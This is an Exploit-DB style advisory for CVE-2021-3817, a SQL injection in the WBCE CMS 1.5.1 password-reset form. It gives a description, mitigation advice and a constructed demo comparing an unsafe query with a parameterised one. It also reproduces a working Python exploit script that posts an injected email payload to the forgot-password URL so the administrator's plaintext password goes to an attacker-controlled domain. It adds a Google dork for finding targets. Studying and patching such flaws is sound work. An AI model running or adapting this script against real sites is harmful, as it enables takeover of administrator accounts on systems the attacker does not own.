Vendor: WBCE CMS
By: citril
CVSS: 9.8 (CRITICAL)
Type: Password Reset
CWE: 89
Product Name: WBCE CMS
Affected Version From: 1.5.2001
Affected Version To: 1.5.2001
Patch Exists: YES
Related CVE: CVE-2021-3817
CPE: a:wbce:wbce_cms
Metasploit:
Other Scripts:
Platforms Tested: Linux
Year: 2021

WBCE CMS 1.5.1 – Admin Password Reset

An attacker can exploit a SQL injection vulnerability in the password-reset form of WBCE CMS version 1.5.1 to reset the administrator password. The attacker sends a specially crafted HTTP POST request to the forgot-password URL in which the email parameter carries a SQL injection payload (a quote that closes the string literal, followed by 'or user_id=1', and ending in 'admin@domain.com') together with an arbitrary value for the submit parameter. The injected condition makes the lookup match the administrator account, and the application then sends a plaintext password to the attacker-controlled email address.

Mitigation:

Upgrade to a patched version of WBCE CMS (the affected range listed above ends at 1.5.1) and make sure the password-reset lookup, like every other query that takes user input, uses parameterised (prepared) statements rather than string concatenation, in addition to validating the submitted email address.
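To make the mitigation concrete, the following added example (my own code, not WBCE's; the users table, schema and attacker.example domain are constructed placeholders) decodes a request body shaped like the one in the advisory and runs the resulting email value through a hypothetical string-concatenated lookup and through its parameterised replacement, showing that only the former returns the administrator row:

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed request body in the shape the advisory describes (placeholder domain).
BODY = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40attacker.example&submit=x"


def make_db():
    # Constructed stand-in for a CMS users table; not WBCE's real schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, username TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin@example.com"),
                    (2, "editor", "editor@example.com")])
    return db


def submitted_email(body):
    # What the server sees after form decoding: %27 -> ' and %40 -> @
    return parse_qs(body)["email"][0]


def lookup_unsafe(db, email):
    # Hypothetical vulnerable pattern: the address is concatenated into the SQL,
    # so the leading quote closes the literal and the injected OR clauses decide
    # which row is matched (here user_id=1, the administrator).
    sql = f"SELECT user_id, username FROM users WHERE email='{email}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, email):
    # Hardened form: a bound parameter is only ever compared as a value,
    # so the same input matches no account.
    return db.execute(
        "SELECT user_id, username FROM users WHERE email=?", (email,)).fetchall()


def demo():
    db = make_db()
    email = submitted_email(BODY)
    return {"email": email,
            "unsafe": lookup_unsafe(db, email),
            "safe": lookup_safe(db, email)}


if __name__ == "__main__":
    print(demo())
```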

Exploit-DB raw data:

# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75

import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from my localhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')